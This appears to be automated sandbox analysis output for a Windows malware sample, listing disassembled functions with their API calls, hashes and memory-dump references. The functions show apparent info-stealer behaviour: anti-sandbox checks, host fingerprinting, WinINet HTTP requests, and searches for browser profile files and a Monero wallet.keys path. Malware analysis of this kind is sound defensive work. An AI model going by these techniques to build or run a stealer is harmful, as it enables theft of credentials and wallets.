                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 5dc18c0d210c3ea912b2dae390643fd10dceef39357ff74629fd66cc35f7a276
                  • Instruction ID: 6d1af4a9677130922d09afde33b080ad4c1ac822c88d1357ea2486d6cdff11d5
                  • Opcode Fuzzy Hash: 5dc18c0d210c3ea912b2dae390643fd10dceef39357ff74629fd66cc35f7a276
                  • Instruction Fuzzy Hash: 08016DB0D49308FBEB10DBE4EC49B9EBB79AB14701F208048F705BA2C0D7B456818B99
                  Function 00636AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1218 636af3 1219 636b0a 1218->1219 1221 636aba-636ad7 call 63aad0 OpenEventA 1219->1221 1222 636b0c-636b22 call 636920 call 635b10 CloseHandle ExitProcess 1219->1222 1227 636af5-636b04 CloseHandle Sleep 1221->1227 1228 636ad9-636af1 call 63aad0 CreateEventA 1221->1228 1227->1219 1228->1222
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00636AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00636AF9
                  • Sleep.KERNEL32(00001770), ref: 00636B04
                  • CloseHandle.KERNEL32(?,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636B1A
                  • ExitProcess.KERNEL32 ref: 00636B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: b537d1dca95a8391d265d4c504463a3d1854be330507b47103092cf8556384d4
                  • Instruction ID: afda312c3d2c46fef783cda381aab3bbf09abe7b4ec39df8c65afad6a6f52e90
                  • Opcode Fuzzy Hash: b537d1dca95a8391d265d4c504463a3d1854be330507b47103092cf8556384d4
                  • Instruction Fuzzy Hash: E9F03A30940209BAE740ABA0DD16BBDBA76FB04701F109518F913A61C1CBF05541EADA
                  Function 006247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 7aca8808e71edac8fb25ac9f7a175a9c05003303aff2aef568b17ef4d894901b
                  • Instruction ID: 1ce2017539692fde55ee39bccec78219b69a1ac752bcf2b4a1f8e5710fae67a3
                  • Opcode Fuzzy Hash: 7aca8808e71edac8fb25ac9f7a175a9c05003303aff2aef568b17ef4d894901b
                  • Instruction Fuzzy Hash: 8F215EB1D00208ABDF14DFA4EC45ADE7B79FF04320F108629F955A7290EB706A0ADF81
                  Function 006351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 00626280: InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
                    • Part of subcall function 00626280: StrCmpCA.SHLWAPI(?,0131F730), ref: 00626303
                    • Part of subcall function 00626280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
                    • Part of subcall function 00626280: HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
                    • Part of subcall function 00626280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
                    • Part of subcall function 00626280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: f990d6b9b2fae3ada777a4e6a25e3ef18a059d6718641bf508106cdfbb668004
                  • Instruction ID: e7ba5c92b222c6d6aa88e8014e225620ed6923a0b5193334f3146e33dc30f297
                  • Opcode Fuzzy Hash: f990d6b9b2fae3ada777a4e6a25e3ef18a059d6718641bf508106cdfbb668004
                  • Instruction Fuzzy Hash: DF113070910148ABCB54FFA4DD92AED733AAF50300F40415CF84A5B192EF30AB06EAD5
                  Function 006378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1275 6378e0-637937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 637942-637945 1275->1276 1277 637939-63793e 1275->1277 1278 637962-637972 1276->1278 1277->1278
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 13001849a8258c8efbc58474c8756f4db1dd2309368f03821fd3e7b376b7917c
                  • Instruction ID: c68234bb6e7d6bfa9355b5c9af20bf2fb3fd52458f0ea7d288d1e7e9bce5e982
                  • Opcode Fuzzy Hash: 13001849a8258c8efbc58474c8756f4db1dd2309368f03821fd3e7b376b7917c
                  • Instruction Fuzzy Hash: 880181F1A04208EBD714DF98DD45BAABBB8FB04B21F10422AFA45E7280C37559008BE2
                  Function 00621110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0062112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00621132
                  • ExitProcess.KERNEL32 ref: 00621143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: a5eed244ad22e1057b64c6e57bca09e84fadc0e258f05c3d961105898ee081dc
                  • Instruction ID: 08fbefde01cc763e671969dc4a0ee46a1898becbbcbf3b96be3a53dc9e03147c
                  • Opcode Fuzzy Hash: a5eed244ad22e1057b64c6e57bca09e84fadc0e258f05c3d961105898ee081dc
                  • Instruction Fuzzy Hash: CEE0E67094930CFBE7546BA0AC0EB497678BB05B05F105054F7097B5D0DAF526409E9A
                  Function 006210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006210B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006210F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: dd8f3f064dcc41ca9e0e3420baff48925b65be4ec23e8439a46f6836b7508d4b
                  • Instruction ID: 5f52622689d7df3df4e3c7a09868f4a32c4cb8b341cc9f859f3b456f5060facc
                  • Opcode Fuzzy Hash: dd8f3f064dcc41ca9e0e3420baff48925b65be4ec23e8439a46f6836b7508d4b
                  • Instruction Fuzzy Hash: 0DF0E971641314BBE71496A4AC49FEAB7DCE705715F301448F504E7280D9715E00CEA4
                  Function 00621190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 006378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
                    • Part of subcall function 006378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00637917
                    • Part of subcall function 006378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
                    • Part of subcall function 00637850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006211B7), ref: 00637880
                    • Part of subcall function 00637850: RtlAllocateHeap.NTDLL(00000000), ref: 00637887
                    • Part of subcall function 00637850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
                  • ExitProcess.KERNEL32 ref: 006211C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: a679f7a27869fa551b148460cafc0fa2d12898513b346eff553c25a7a4fc0776
                  • Instruction ID: 1e7d32811fa661ea2aedaac25e5f194f95840d26dfe8183fb5f40b578ff797be
                  • Opcode Fuzzy Hash: a679f7a27869fa551b148460cafc0fa2d12898513b346eff553c25a7a4fc0776
                  • Instruction Fuzzy Hash: A4E0C2B190430917CA5473F0BC0EB6A328E6B20345F04143CFA06E3252FAB4FC108DAE

                  Non-executed Functions

                  Function 006338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 006338CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 006338E3
                  • lstrcat.KERNEL32(?,?), ref: 00633935
                  • StrCmpCA.SHLWAPI(?,00640F70), ref: 00633947
                  • StrCmpCA.SHLWAPI(?,00640F74), ref: 0063395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00633C67
                  • FindClose.KERNEL32(000000FF), ref: 00633C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 98ae8bfe64253255808f9d5942f91733c9bcfa81ba95fc68cf3414c52b1001c9
                  • Instruction ID: 50a9aed2e3192b24b5f304b782b26ea5550c6efcfbd4e171082c3325a9a4054e
                  • Opcode Fuzzy Hash: 98ae8bfe64253255808f9d5942f91733c9bcfa81ba95fc68cf3414c52b1001c9
                  • Instruction Fuzzy Hash: 2CA121B1900218ABDB64DFA4DC85FEE7379BF54300F044598F64DA6241EB759B84CFA2
                  Function 0062BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00640B32,00640B2B,00000000,?,?,?,006413F4,00640B2A), ref: 0062BEF5
                  • StrCmpCA.SHLWAPI(?,006413F8), ref: 0062BF4D
                  • StrCmpCA.SHLWAPI(?,006413FC), ref: 0062BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0062C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 2b16726dd0c56c0d6c45a95cafff309a36dd9bdfe03c587f61c631b6d80757de
                  • Instruction ID: d3b6c973b8d2a211d3375ac9264dddbc59c4f1fbeb49da1db6ab8e3e575d6def
                  • Opcode Fuzzy Hash: 2b16726dd0c56c0d6c45a95cafff309a36dd9bdfe03c587f61c631b6d80757de
